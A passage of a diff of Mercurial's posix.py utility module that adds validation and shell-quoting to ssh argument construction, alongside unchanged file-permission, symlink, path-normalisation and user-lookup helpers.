217 # forward two methods from posixpath that do what we need, but we'd
212 # rather not let our internals know that we're thinking in posix terms
218 # rather not let our internals know that we're thinking in posix terms
213 # - instead we'll let them be oblivious.
219 # - instead we'll let them be oblivious.
214 join = posixpath.join
220 join = posixpath.join
215 dirname = posixpath.dirname
221 dirname = posixpath.dirname
@@ -1,668 +1,675 b''
1 # posix.py - Posix utility function implementations for Mercurial
1 # posix.py - Posix utility function implementations for Mercurial
2 #
2 #
3 # Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
3 # Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 from __future__ import absolute_import
8 from __future__ import absolute_import
9
9
10 import errno
10 import errno
11 import fcntl
11 import fcntl
12 import getpass
12 import getpass
13 import grp
13 import grp
14 import os
14 import os
15 import pwd
15 import pwd
16 import re
16 import re
17 import select
17 import select
18 import stat
18 import stat
19 import sys
19 import sys
20 import tempfile
20 import tempfile
21 import unicodedata
21 import unicodedata
22
22
23 from .i18n import _
23 from .i18n import _
24 from . import (
24 from . import (
25 encoding,
25 encoding,
26 error,
26 pycompat,
27 pycompat,
27 )
28 )
28
29
29 posixfile = open
30 posixfile = open
30 normpath = os.path.normpath
31 normpath = os.path.normpath
31 samestat = os.path.samestat
32 samestat = os.path.samestat
32 try:
33 try:
33 oslink = os.link
34 oslink = os.link
34 except AttributeError:
35 except AttributeError:
35 # Some platforms build Python without os.link on systems that are
36 # Some platforms build Python without os.link on systems that are
36 # vaguely unix-like but don't have hardlink support. For those
37 # vaguely unix-like but don't have hardlink support. For those
37 # poor souls, just say we tried and that it failed so we fall back
38 # poor souls, just say we tried and that it failed so we fall back
38 # to copies.
39 # to copies.
39 def oslink(src, dst):
40 def oslink(src, dst):
40 raise OSError(errno.EINVAL,
41 raise OSError(errno.EINVAL,
41 'hardlinks not supported: %s to %s' % (src, dst))
42 'hardlinks not supported: %s to %s' % (src, dst))
42 unlink = os.unlink
43 unlink = os.unlink
43 rename = os.rename
44 rename = os.rename
44 removedirs = os.removedirs
45 removedirs = os.removedirs
45 expandglobs = False
46 expandglobs = False
46
47
47 umask = os.umask(0)
48 umask = os.umask(0)
48 os.umask(umask)
49 os.umask(umask)
49
50
50 def split(p):
51 def split(p):
51 '''Same as posixpath.split, but faster
52 '''Same as posixpath.split, but faster
52
53
53 >>> import posixpath
54 >>> import posixpath
54 >>> for f in ['/absolute/path/to/file',
55 >>> for f in ['/absolute/path/to/file',
55 ... 'relative/path/to/file',
56 ... 'relative/path/to/file',
56 ... 'file_alone',
57 ... 'file_alone',
57 ... 'path/to/directory/',
58 ... 'path/to/directory/',
58 ... '/multiple/path//separators',
59 ... '/multiple/path//separators',
59 ... '/file_at_root',
60 ... '/file_at_root',
60 ... '///multiple_leading_separators_at_root',
61 ... '///multiple_leading_separators_at_root',
61 ... '']:
62 ... '']:
62 ... assert split(f) == posixpath.split(f), f
63 ... assert split(f) == posixpath.split(f), f
63 '''
64 '''
64 ht = p.rsplit('/', 1)
65 ht = p.rsplit('/', 1)
65 if len(ht) == 1:
66 if len(ht) == 1:
66 return '', p
67 return '', p
67 nh = ht[0].rstrip('/')
68 nh = ht[0].rstrip('/')
68 if nh:
69 if nh:
69 return nh, ht[1]
70 return nh, ht[1]
70 return ht[0] + '/', ht[1]
71 return ht[0] + '/', ht[1]
71
72
72 def openhardlinks():
73 def openhardlinks():
73 '''return true if it is safe to hold open file handles to hardlinks'''
74 '''return true if it is safe to hold open file handles to hardlinks'''
74 return True
75 return True
75
76
76 def nlinks(name):
77 def nlinks(name):
77 '''return number of hardlinks for the given file'''
78 '''return number of hardlinks for the given file'''
78 return os.lstat(name).st_nlink
79 return os.lstat(name).st_nlink
79
80
80 def parsepatchoutput(output_line):
81 def parsepatchoutput(output_line):
81 """parses the output produced by patch and returns the filename"""
82 """parses the output produced by patch and returns the filename"""
82 pf = output_line[14:]
83 pf = output_line[14:]
83 if pycompat.sysplatform == 'OpenVMS':
84 if pycompat.sysplatform == 'OpenVMS':
84 if pf[0] == '`':
85 if pf[0] == '`':
85 pf = pf[1:-1] # Remove the quotes
86 pf = pf[1:-1] # Remove the quotes
86 else:
87 else:
87 if pf.startswith("'") and pf.endswith("'") and " " in pf:
88 if pf.startswith("'") and pf.endswith("'") and " " in pf:
88 pf = pf[1:-1] # Remove the quotes
89 pf = pf[1:-1] # Remove the quotes
89 return pf
90 return pf
90
91
91 def sshargs(sshcmd, host, user, port):
92 def sshargs(sshcmd, host, user, port):
92 '''Build argument list for ssh'''
93 '''Build argument list for ssh'''
93 args = user and ("%s@%s" % (user, host)) or host
94 args = user and ("%s@%s" % (user, host)) or host
94 return port and ("%s -p %s" % (args, port)) or args
95 if '-' in args[:1]:
96 raise error.Abort(
97 _('illegal ssh hostname or username starting with -: %s') % args)
98 args = shellquote(args)
99 if port:
100 args = '-p %s %s' % (shellquote(port), args)
101 return args
95
102
96 def isexec(f):
103 def isexec(f):
97 """check whether a file is executable"""
104 """check whether a file is executable"""
98 return (os.lstat(f).st_mode & 0o100 != 0)
105 return (os.lstat(f).st_mode & 0o100 != 0)
99
106
100 def setflags(f, l, x):
107 def setflags(f, l, x):
101 st = os.lstat(f)
108 st = os.lstat(f)
102 s = st.st_mode
109 s = st.st_mode
103 if l:
110 if l:
104 if not stat.S_ISLNK(s):
111 if not stat.S_ISLNK(s):
105 # switch file to link
112 # switch file to link
106 fp = open(f)
113 fp = open(f)
107 data = fp.read()
114 data = fp.read()
108 fp.close()
115 fp.close()
109 unlink(f)
116 unlink(f)
110 try:
117 try:
111 os.symlink(data, f)
118 os.symlink(data, f)
112 except OSError:
119 except OSError:
113 # failed to make a link, rewrite file
120 # failed to make a link, rewrite file
114 fp = open(f, "w")
121 fp = open(f, "w")
115 fp.write(data)
122 fp.write(data)
116 fp.close()
123 fp.close()
117 # no chmod needed at this point
124 # no chmod needed at this point
118 return
125 return
119 if stat.S_ISLNK(s):
126 if stat.S_ISLNK(s):
120 # switch link to file
127 # switch link to file
121 data = os.readlink(f)
128 data = os.readlink(f)
122 unlink(f)
129 unlink(f)
123 fp = open(f, "w")
130 fp = open(f, "w")
124 fp.write(data)
131 fp.write(data)
125 fp.close()
132 fp.close()
126 s = 0o666 & ~umask # avoid restatting for chmod
133 s = 0o666 & ~umask # avoid restatting for chmod
127
134
128 sx = s & 0o100
135 sx = s & 0o100
129 if st.st_nlink > 1 and bool(x) != bool(sx):
136 if st.st_nlink > 1 and bool(x) != bool(sx):
130 # the file is a hardlink, break it
137 # the file is a hardlink, break it
131 with open(f, "rb") as fp:
138 with open(f, "rb") as fp:
132 data = fp.read()
139 data = fp.read()
133 unlink(f)
140 unlink(f)
134 with open(f, "wb") as fp:
141 with open(f, "wb") as fp:
135 fp.write(data)
142 fp.write(data)
136
143
137 if x and not sx:
144 if x and not sx:
138 # Turn on +x for every +r bit when making a file executable
145 # Turn on +x for every +r bit when making a file executable
139 # and obey umask.
146 # and obey umask.
140 os.chmod(f, s | (s & 0o444) >> 2 & ~umask)
147 os.chmod(f, s | (s & 0o444) >> 2 & ~umask)
141 elif not x and sx:
148 elif not x and sx:
142 # Turn off all +x bits
149 # Turn off all +x bits
143 os.chmod(f, s & 0o666)
150 os.chmod(f, s & 0o666)
144
151
145 def copymode(src, dst, mode=None):
152 def copymode(src, dst, mode=None):
146 '''Copy the file mode from the file at path src to dst.
153 '''Copy the file mode from the file at path src to dst.
147 If src doesn't exist, we're using mode instead. If mode is None, we're
154 If src doesn't exist, we're using mode instead. If mode is None, we're
148 using umask.'''
155 using umask.'''
149 try:
156 try:
150 st_mode = os.lstat(src).st_mode & 0o777
157 st_mode = os.lstat(src).st_mode & 0o777
151 except OSError as inst:
158 except OSError as inst:
152 if inst.errno != errno.ENOENT:
159 if inst.errno != errno.ENOENT:
153 raise
160 raise
154 st_mode = mode
161 st_mode = mode
155 if st_mode is None:
162 if st_mode is None:
156 st_mode = ~umask
163 st_mode = ~umask
157 st_mode &= 0o666
164 st_mode &= 0o666
158 os.chmod(dst, st_mode)
165 os.chmod(dst, st_mode)
159
166
160 def checkexec(path):
167 def checkexec(path):
161 """
168 """
162 Check whether the given path is on a filesystem with UNIX-like exec flags
169 Check whether the given path is on a filesystem with UNIX-like exec flags
163
170
164 Requires a directory (like /foo/.hg)
171 Requires a directory (like /foo/.hg)
165 """
172 """
166
173
167 # VFAT on some Linux versions can flip mode but it doesn't persist
174 # VFAT on some Linux versions can flip mode but it doesn't persist
168 # a FS remount. Frequently we can detect it if files are created
175 # a FS remount. Frequently we can detect it if files are created
169 # with exec bit on.
176 # with exec bit on.
170
177
171 try:
178 try:
172 EXECFLAGS = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH
179 EXECFLAGS = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH
173 cachedir = os.path.join(path, '.hg', 'cache')
180 cachedir = os.path.join(path, '.hg', 'cache')
174 if os.path.isdir(cachedir):
181 if os.path.isdir(cachedir):
175 checkisexec = os.path.join(cachedir, 'checkisexec')
182 checkisexec = os.path.join(cachedir, 'checkisexec')
176 checknoexec = os.path.join(cachedir, 'checknoexec')
183 checknoexec = os.path.join(cachedir, 'checknoexec')
177
184
178 try:
185 try:
179 m = os.stat(checkisexec).st_mode
186 m = os.stat(checkisexec).st_mode
180 except OSError as e:
187 except OSError as e:
181 if e.errno != errno.ENOENT:
188 if e.errno != errno.ENOENT:
182 raise
189 raise
183 # checkisexec does not exist - fall through ...
190 # checkisexec does not exist - fall through ...
184 else:
191 else:
185 # checkisexec exists, check if it actually is exec
192 # checkisexec exists, check if it actually is exec
186 if m & EXECFLAGS != 0:
193 if m & EXECFLAGS != 0:
187 # ensure checkisexec exists, check it isn't exec
194 # ensure checkisexec exists, check it isn't exec
188 try:
195 try:
189 m = os.stat(checknoexec).st_mode
196 m = os.stat(checknoexec).st_mode
190 except OSError as e:
197 except OSError as e:
191 if e.errno != errno.ENOENT:
198 if e.errno != errno.ENOENT:
192 raise
199 raise
193 open(checknoexec, 'w').close() # might fail
200 open(checknoexec, 'w').close() # might fail
194 m = os.stat(checknoexec).st_mode
201 m = os.stat(checknoexec).st_mode
195 if m & EXECFLAGS == 0:
202 if m & EXECFLAGS == 0:
196 # check-exec is exec and check-no-exec is not exec
203 # check-exec is exec and check-no-exec is not exec
197 return True
204 return True
198 # checknoexec exists but is exec - delete it
205 # checknoexec exists but is exec - delete it
199 unlink(checknoexec)
206 unlink(checknoexec)
200 # checkisexec exists but is not exec - delete it
207 # checkisexec exists but is not exec - delete it
201 unlink(checkisexec)
208 unlink(checkisexec)
202
209
203 # check using one file, leave it as checkisexec
210 # check using one file, leave it as checkisexec
204 checkdir = cachedir
211 checkdir = cachedir
205 else:
212 else:
206 # check directly in path and don't leave checkisexec behind
213 # check directly in path and don't leave checkisexec behind
207 checkdir = path
214 checkdir = path
208 checkisexec = None
215 checkisexec = None
209 fh, fn = tempfile.mkstemp(dir=checkdir, prefix='hg-checkexec-')
216 fh, fn = tempfile.mkstemp(dir=checkdir, prefix='hg-checkexec-')
210 try:
217 try:
211 os.close(fh)
218 os.close(fh)
212 m = os.stat(fn).st_mode
219 m = os.stat(fn).st_mode
213 if m & EXECFLAGS == 0:
220 if m & EXECFLAGS == 0:
214 os.chmod(fn, m & 0o777 | EXECFLAGS)
221 os.chmod(fn, m & 0o777 | EXECFLAGS)
215 if os.stat(fn).st_mode & EXECFLAGS != 0:
222 if os.stat(fn).st_mode & EXECFLAGS != 0:
216 if checkisexec is not None:
223 if checkisexec is not None:
217 os.rename(fn, checkisexec)
224 os.rename(fn, checkisexec)
218 fn = None
225 fn = None
219 return True
226 return True
220 finally:
227 finally:
221 if fn is not None:
228 if fn is not None:
222 unlink(fn)
229 unlink(fn)
223 except (IOError, OSError):
230 except (IOError, OSError):
224 # we don't care, the user probably won't be able to commit anyway
231 # we don't care, the user probably won't be able to commit anyway
225 return False
232 return False
226
233
227 def checklink(path):
234 def checklink(path):
228 """check whether the given path is on a symlink-capable filesystem"""
235 """check whether the given path is on a symlink-capable filesystem"""
229 # mktemp is not racy because symlink creation will fail if the
236 # mktemp is not racy because symlink creation will fail if the
230 # file already exists
237 # file already exists
231 while True:
238 while True:
232 cachedir = os.path.join(path, '.hg', 'cache')
239 cachedir = os.path.join(path, '.hg', 'cache')
233 checklink = os.path.join(cachedir, 'checklink')
240 checklink = os.path.join(cachedir, 'checklink')
234 # try fast path, read only
241 # try fast path, read only
235 if os.path.islink(checklink):
242 if os.path.islink(checklink):
236 return True
243 return True
237 if os.path.isdir(cachedir):
244 if os.path.isdir(cachedir):
238 checkdir = cachedir
245 checkdir = cachedir
239 else:
246 else:
240 checkdir = path
247 checkdir = path
241 cachedir = None
248 cachedir = None
242 fscheckdir = pycompat.fsdecode(checkdir)
249 fscheckdir = pycompat.fsdecode(checkdir)
243 name = tempfile.mktemp(dir=fscheckdir,
250 name = tempfile.mktemp(dir=fscheckdir,
244 prefix=r'checklink-')
251 prefix=r'checklink-')
245 name = pycompat.fsencode(name)
252 name = pycompat.fsencode(name)
246 try:
253 try:
247 fd = None
254 fd = None
248 if cachedir is None:
255 if cachedir is None:
249 fd = tempfile.NamedTemporaryFile(dir=fscheckdir,
256 fd = tempfile.NamedTemporaryFile(dir=fscheckdir,
250 prefix=r'hg-checklink-')
257 prefix=r'hg-checklink-')
251 target = pycompat.fsencode(os.path.basename(fd.name))
258 target = pycompat.fsencode(os.path.basename(fd.name))
252 else:
259 else:
253 # create a fixed file to link to; doesn't matter if it
260 # create a fixed file to link to; doesn't matter if it
254 # already exists.
261 # already exists.
255 target = 'checklink-target'
262 target = 'checklink-target'
256 try:
263 try:
257 open(os.path.join(cachedir, target), 'w').close()
264 open(os.path.join(cachedir, target), 'w').close()
258 except IOError as inst:
265 except IOError as inst:
259 if inst[0] == errno.EACCES:
266 if inst[0] == errno.EACCES:
260 # If we can't write to cachedir, just pretend
267 # If we can't write to cachedir, just pretend
261 # that the fs is readonly and by association
268 # that the fs is readonly and by association
262 # that the fs won't support symlinks. This
269 # that the fs won't support symlinks. This
263 # seems like the least dangerous way to avoid
270 # seems like the least dangerous way to avoid
264 # data loss.
271 # data loss.
265 return False
272 return False
266 raise
273 raise
267 try:
274 try:
268 os.symlink(target, name)
275 os.symlink(target, name)
269 if cachedir is None:
276 if cachedir is None:
270 unlink(name)
277 unlink(name)
271 else:
278 else:
272 try:
279 try:
273 os.rename(name, checklink)
280 os.rename(name, checklink)
274 except OSError:
281 except OSError:
275 unlink(name)
282 unlink(name)
276 return True
283 return True
277 except OSError as inst:
284 except OSError as inst:
278 # link creation might race, try again
285 # link creation might race, try again
279 if inst[0] == errno.EEXIST:
286 if inst[0] == errno.EEXIST:
280 continue
287 continue
281 raise
288 raise
282 finally:
289 finally:
283 if fd is not None:
290 if fd is not None:
284 fd.close()
291 fd.close()
285 except AttributeError:
292 except AttributeError:
286 return False
293 return False
287 except OSError as inst:
294 except OSError as inst:
288 # sshfs might report failure while successfully creating the link
295 # sshfs might report failure while successfully creating the link
289 if inst[0] == errno.EIO and os.path.exists(name):
296 if inst[0] == errno.EIO and os.path.exists(name):
290 unlink(name)
297 unlink(name)
291 return False
298 return False
292
299
293 def checkosfilename(path):
300 def checkosfilename(path):
294 '''Check that the base-relative path is a valid filename on this platform.
301 '''Check that the base-relative path is a valid filename on this platform.
295 Returns None if the path is ok, or a UI string describing the problem.'''
302 Returns None if the path is ok, or a UI string describing the problem.'''
296 pass # on posix platforms, every path is ok
303 pass # on posix platforms, every path is ok
297
304
298 def setbinary(fd):
305 def setbinary(fd):
299 pass
306 pass
300
307
301 def pconvert(path):
308 def pconvert(path):
302 return path
309 return path
303
310
304 def localpath(path):
311 def localpath(path):
305 return path
312 return path
306
313
307 def samefile(fpath1, fpath2):
314 def samefile(fpath1, fpath2):
308 """Returns whether path1 and path2 refer to the same file. This is only
315 """Returns whether path1 and path2 refer to the same file. This is only
309 guaranteed to work for files, not directories."""
316 guaranteed to work for files, not directories."""
310 return os.path.samefile(fpath1, fpath2)
317 return os.path.samefile(fpath1, fpath2)
311
318
312 def samedevice(fpath1, fpath2):
319 def samedevice(fpath1, fpath2):
313 """Returns whether fpath1 and fpath2 are on the same device. This is only
320 """Returns whether fpath1 and fpath2 are on the same device. This is only
314 guaranteed to work for files, not directories."""
321 guaranteed to work for files, not directories."""
315 st1 = os.lstat(fpath1)
322 st1 = os.lstat(fpath1)
316 st2 = os.lstat(fpath2)
323 st2 = os.lstat(fpath2)
317 return st1.st_dev == st2.st_dev
324 return st1.st_dev == st2.st_dev
318
325
319 # os.path.normcase is a no-op, which doesn't help us on non-native filesystems
326 # os.path.normcase is a no-op, which doesn't help us on non-native filesystems
320 def normcase(path):
327 def normcase(path):
321 return path.lower()
328 return path.lower()
322
329
323 # what normcase does to ASCII strings
330 # what normcase does to ASCII strings
324 normcasespec = encoding.normcasespecs.lower
331 normcasespec = encoding.normcasespecs.lower
325 # fallback normcase function for non-ASCII strings
332 # fallback normcase function for non-ASCII strings
326 normcasefallback = normcase
333 normcasefallback = normcase
327
334
328 if pycompat.sysplatform == 'darwin':
335 if pycompat.sysplatform == 'darwin':
329
336
330 def normcase(path):
337 def normcase(path):
331 '''
338 '''
332 Normalize a filename for OS X-compatible comparison:
339 Normalize a filename for OS X-compatible comparison:
333 - escape-encode invalid characters
340 - escape-encode invalid characters
334 - decompose to NFD
341 - decompose to NFD
335 - lowercase
342 - lowercase
336 - omit ignored characters [200c-200f, 202a-202e, 206a-206f,feff]
343 - omit ignored characters [200c-200f, 202a-202e, 206a-206f,feff]
337
344
338 >>> normcase('UPPER')
345 >>> normcase('UPPER')
339 'upper'
346 'upper'
340 >>> normcase('Caf\xc3\xa9')
347 >>> normcase('Caf\xc3\xa9')
341 'cafe\\xcc\\x81'
348 'cafe\\xcc\\x81'
342 >>> normcase('\xc3\x89')
349 >>> normcase('\xc3\x89')
343 'e\\xcc\\x81'
350 'e\\xcc\\x81'
344 >>> normcase('\xb8\xca\xc3\xca\xbe\xc8.JPG') # issue3918
351 >>> normcase('\xb8\xca\xc3\xca\xbe\xc8.JPG') # issue3918
345 '%b8%ca%c3\\xca\\xbe%c8.jpg'
352 '%b8%ca%c3\\xca\\xbe%c8.jpg'
346 '''
353 '''
347
354
348 try:
355 try:
349 return encoding.asciilower(path) # exception for non-ASCII
356 return encoding.asciilower(path) # exception for non-ASCII
350 except UnicodeDecodeError:
357 except UnicodeDecodeError:
351 return normcasefallback(path)
358 return normcasefallback(path)
352
359
353 normcasespec = encoding.normcasespecs.lower
360 normcasespec = encoding.normcasespecs.lower
354
361
355 def normcasefallback(path):
362 def normcasefallback(path):
356 try:
363 try:
357 u = path.decode('utf-8')
364 u = path.decode('utf-8')
358 except UnicodeDecodeError:
365 except UnicodeDecodeError:
359 # OS X percent-encodes any bytes that aren't valid utf-8
366 # OS X percent-encodes any bytes that aren't valid utf-8
360 s = ''
367 s = ''
361 pos = 0
368 pos = 0
362 l = len(path)
369 l = len(path)
363 while pos < l:
370 while pos < l:
364 try:
371 try:
365 c = encoding.getutf8char(path, pos)
372 c = encoding.getutf8char(path, pos)
366 pos += len(c)
373 pos += len(c)
367 except ValueError:
374 except ValueError:
368 c = '%%%02X' % ord(path[pos])
375 c = '%%%02X' % ord(path[pos])
369 pos += 1
376 pos += 1
370 s += c
377 s += c
371
378
372 u = s.decode('utf-8')
379 u = s.decode('utf-8')
373
380
374 # Decompose then lowercase (HFS+ technote specifies lower)
381 # Decompose then lowercase (HFS+ technote specifies lower)
375 enc = unicodedata.normalize('NFD', u).lower().encode('utf-8')
382 enc = unicodedata.normalize('NFD', u).lower().encode('utf-8')
376 # drop HFS+ ignored characters
383 # drop HFS+ ignored characters
377 return encoding.hfsignoreclean(enc)
384 return encoding.hfsignoreclean(enc)
378
385
379 if pycompat.sysplatform == 'cygwin':
386 if pycompat.sysplatform == 'cygwin':
380 # workaround for cygwin, in which mount point part of path is
387 # workaround for cygwin, in which mount point part of path is
381 # treated as case sensitive, even though underlying NTFS is case
388 # treated as case sensitive, even though underlying NTFS is case
382 # insensitive.
389 # insensitive.
383
390
384 # default mount points
391 # default mount points
385 cygwinmountpoints = sorted([
392 cygwinmountpoints = sorted([
386 "/usr/bin",
393 "/usr/bin",
387 "/usr/lib",
394 "/usr/lib",
388 "/cygdrive",
395 "/cygdrive",
389 ], reverse=True)
396 ], reverse=True)
390
397
391 # use upper-ing as normcase as same as NTFS workaround
398 # use upper-ing as normcase as same as NTFS workaround
392 def normcase(path):
399 def normcase(path):
393 pathlen = len(path)
400 pathlen = len(path)
394 if (pathlen == 0) or (path[0] != pycompat.ossep):
401 if (pathlen == 0) or (path[0] != pycompat.ossep):
395 # treat as relative
402 # treat as relative
396 return encoding.upper(path)
403 return encoding.upper(path)
397
404
398 # to preserve case of mountpoint part
405 # to preserve case of mountpoint part
399 for mp in cygwinmountpoints:
406 for mp in cygwinmountpoints:
400 if not path.startswith(mp):
407 if not path.startswith(mp):
401 continue
408 continue
402
409
403 mplen = len(mp)
410 mplen = len(mp)
404 if mplen == pathlen: # mount point itself
411 if mplen == pathlen: # mount point itself
405 return mp
412 return mp
406 if path[mplen] == pycompat.ossep:
413 if path[mplen] == pycompat.ossep:
407 return mp + encoding.upper(path[mplen:])
414 return mp + encoding.upper(path[mplen:])
408
415
409 return encoding.upper(path)
416 return encoding.upper(path)
410
417
411 normcasespec = encoding.normcasespecs.other
418 normcasespec = encoding.normcasespecs.other
412 normcasefallback = normcase
419 normcasefallback = normcase
413
420
414 # Cygwin translates native ACLs to POSIX permissions,
421 # Cygwin translates native ACLs to POSIX permissions,
415 # but these translations are not supported by native
422 # but these translations are not supported by native
416 # tools, so the exec bit tends to be set erroneously.
423 # tools, so the exec bit tends to be set erroneously.
417 # Therefore, disable executable bit access on Cygwin.
424 # Therefore, disable executable bit access on Cygwin.
418 def checkexec(path):
425 def checkexec(path):
419 return False
426 return False
420
427
421 # Similarly, Cygwin's symlink emulation is likely to create
428 # Similarly, Cygwin's symlink emulation is likely to create
422 # problems when Mercurial is used from both Cygwin and native
429 # problems when Mercurial is used from both Cygwin and native
423 # Windows, with other native tools, or on shared volumes
430 # Windows, with other native tools, or on shared volumes
424 def checklink(path):
431 def checklink(path):
425 return False
432 return False
426
433
427 _needsshellquote = None
434 _needsshellquote = None
428 def shellquote(s):
435 def shellquote(s):
429 if pycompat.sysplatform == 'OpenVMS':
436 if pycompat.sysplatform == 'OpenVMS':
430 return '"%s"' % s
437 return '"%s"' % s
431 global _needsshellquote
438 global _needsshellquote
432 if _needsshellquote is None:
439 if _needsshellquote is None:
433 _needsshellquote = re.compile(br'[^a-zA-Z0-9._/+-]').search
440 _needsshellquote = re.compile(br'[^a-zA-Z0-9._/+-]').search
434 if s and not _needsshellquote(s):
441 if s and not _needsshellquote(s):
435 # "s" shouldn't have to be quoted
442 # "s" shouldn't have to be quoted
436 return s
443 return s
437 else:
444 else:
438 return "'%s'" % s.replace("'", "'\\''")
445 return "'%s'" % s.replace("'", "'\\''")
439
446
440 def quotecommand(cmd):
447 def quotecommand(cmd):
441 return cmd
448 return cmd
442
449
443 def popen(command, mode='r'):
450 def popen(command, mode='r'):
444 return os.popen(command, mode)
451 return os.popen(command, mode)
445
452
446 def testpid(pid):
453 def testpid(pid):
447 '''return False if pid dead, True if running or not sure'''
454 '''return False if pid dead, True if running or not sure'''
448 if pycompat.sysplatform == 'OpenVMS':
455 if pycompat.sysplatform == 'OpenVMS':
449 return True
456 return True
450 try:
457 try:
451 os.kill(pid, 0)
458 os.kill(pid, 0)
452 return True
459 return True
453 except OSError as inst:
460 except OSError as inst:
454 return inst.errno != errno.ESRCH
461 return inst.errno != errno.ESRCH
455
462
456 def explainexit(code):
463 def explainexit(code):
457 """return a 2-tuple (desc, code) describing a subprocess status
464 """return a 2-tuple (desc, code) describing a subprocess status
458 (codes from kill are negative - not os.system/wait encoding)"""
465 (codes from kill are negative - not os.system/wait encoding)"""
459 if code >= 0:
466 if code >= 0:
460 return _("exited with status %d") % code, code
467 return _("exited with status %d") % code, code
461 return _("killed by signal %d") % -code, -code
468 return _("killed by signal %d") % -code, -code
462
469
463 def isowner(st):
470 def isowner(st):
464 """Return True if the stat object st is from the current user."""
471 """Return True if the stat object st is from the current user."""
465 return st.st_uid == os.getuid()
472 return st.st_uid == os.getuid()
466
473
467 def findexe(command):
474 def findexe(command):
468 '''Find executable for command searching like which does.
475 '''Find executable for command searching like which does.
469 If command is a basename then PATH is searched for command.
476 If command is a basename then PATH is searched for command.
470 PATH isn't searched if command is an absolute or relative path.
477 PATH isn't searched if command is an absolute or relative path.
471 If command isn't found None is returned.'''
478 If command isn't found None is returned.'''
472 if pycompat.sysplatform == 'OpenVMS':
479 if pycompat.sysplatform == 'OpenVMS':
473 return command
480 return command
474
481
475 def findexisting(executable):
482 def findexisting(executable):
476 'Will return executable if existing file'
483 'Will return executable if existing file'
477 if os.path.isfile(executable) and os.access(executable, os.X_OK):
484 if os.path.isfile(executable) and os.access(executable, os.X_OK):
478 return executable
485 return executable
479 return None
486 return None
480
487
481 if pycompat.ossep in command:
488 if pycompat.ossep in command:
482 return findexisting(command)
489 return findexisting(command)
483
490
484 if pycompat.sysplatform == 'plan9':
491 if pycompat.sysplatform == 'plan9':
485 return findexisting(os.path.join('/bin', command))
492 return findexisting(os.path.join('/bin', command))
486
493
487 for path in encoding.environ.get('PATH', '').split(pycompat.ospathsep):
494 for path in encoding.environ.get('PATH', '').split(pycompat.ospathsep):
488 executable = findexisting(os.path.join(path, command))
495 executable = findexisting(os.path.join(path, command))
489 if executable is not None:
496 if executable is not None:
490 return executable
497 return executable
491 return None
498 return None
492
499
493 def setsignalhandler():
500 def setsignalhandler():
494 pass
501 pass
495
502
496 _wantedkinds = {stat.S_IFREG, stat.S_IFLNK}
503 _wantedkinds = {stat.S_IFREG, stat.S_IFLNK}
497
504
498 def statfiles(files):
505 def statfiles(files):
499 '''Stat each file in files. Yield each stat, or None if a file does not
506 '''Stat each file in files. Yield each stat, or None if a file does not
500 exist or has a type we don't care about.'''
507 exist or has a type we don't care about.'''
501 lstat = os.lstat
508 lstat = os.lstat
502 getkind = stat.S_IFMT
509 getkind = stat.S_IFMT
503 for nf in files:
510 for nf in files:
504 try:
511 try:
505 st = lstat(nf)
512 st = lstat(nf)
506 if getkind(st.st_mode) not in _wantedkinds:
513 if getkind(st.st_mode) not in _wantedkinds:
507 st = None
514 st = None
508 except OSError as err:
515 except OSError as err:
509 if err.errno not in (errno.ENOENT, errno.ENOTDIR):
516 if err.errno not in (errno.ENOENT, errno.ENOTDIR):
510 raise
517 raise
511 st = None
518 st = None
512 yield st
519 yield st
513
520
514 def getuser():
521 def getuser():
515 '''return name of current user'''
522 '''return name of current user'''
516 return pycompat.fsencode(getpass.getuser())
523 return pycompat.fsencode(getpass.getuser())
517
524
518 def username(uid=None):
525 def username(uid=None):
519 """Return the name of the user with the given uid.
526 """Return the name of the user with the given uid.
520
527
521 If uid is None, return the name of the current user."""
528 If uid is None, return the name of the current user."""
522
529
523 if uid is None:
530 if uid is None:
524 uid = os.getuid()
531 uid = os.getuid()
525 try:
532 try:
526 return pwd.getpwuid(uid)[0]
533 return pwd.getpwuid(uid)[0]
527 except KeyError:
534 except KeyError:
528 return str(uid)
535 return str(uid)
529
536
530 def groupname(gid=None):
537 def groupname(gid=None):
531 """Return the name of the group with the given gid.
538 """Return the name of the group with the given gid.
532
539
533 If gid is None, return the name of the current group."""
540 If gid is None, return the name of the current group."""
534
541
535 if gid is None:
542 if gid is None:
536 gid = os.getgid()
543 gid = os.getgid()
537 try:
544 try:
538 return grp.getgrgid(gid)[0]
545 return grp.getgrgid(gid)[0]
539 except KeyError:
546 except KeyError:
540 return str(gid)
547 return str(gid)
541
548
542 def groupmembers(name):
549 def groupmembers(name):
543 """Return the list of members of the group with the given
550 """Return the list of members of the group with the given
544 name, KeyError if the group does not exist.
551 name, KeyError if the group does not exist.
545 """
552 """
546 return list(grp.getgrnam(name).gr_mem)
553 return list(grp.getgrnam(name).gr_mem)
547
554
548 def spawndetached(args):
555 def spawndetached(args):
549 return os.spawnvp(os.P_NOWAIT | getattr(os, 'P_DETACH', 0),
556 return os.spawnvp(os.P_NOWAIT | getattr(os, 'P_DETACH', 0),
550 args[0], args)
557 args[0], args)
551
558
552 def gethgcmd():
559 def gethgcmd():
553 return sys.argv[:1]
560 return sys.argv[:1]
554
561
555 def makedir(path, notindexed):
562 def makedir(path, notindexed):
556 os.mkdir(path)
563 os.mkdir(path)
557
564
558 def lookupreg(key, name=None, scope=None):
565 def lookupreg(key, name=None, scope=None):
559 return None
566 return None
560
567
561 def hidewindow():
568 def hidewindow():
562 """Hide current shell window.
569 """Hide current shell window.
563
570
564 Used to hide the window opened when starting asynchronous
571 Used to hide the window opened when starting asynchronous
565 child process under Windows, unneeded on other systems.
572 child process under Windows, unneeded on other systems.
566 """
573 """
567 pass
574 pass
568
575
569 class cachestat(object):
576 class cachestat(object):
570 def __init__(self, path):
577 def __init__(self, path):
571 self.stat = os.stat(path)
578 self.stat = os.stat(path)
572
579
573 def cacheable(self):
580 def cacheable(self):
574 return bool(self.stat.st_ino)
581 return bool(self.stat.st_ino)
575
582
576 __hash__ = object.__hash__
583 __hash__ = object.__hash__
577
584
578 def __eq__(self, other):
585 def __eq__(self, other):
579 try:
586 try:
580 # Only dev, ino, size, mtime and atime are likely to change. Out
587 # Only dev, ino, size, mtime and atime are likely to change. Out
581 # of these, we shouldn't compare atime but should compare the
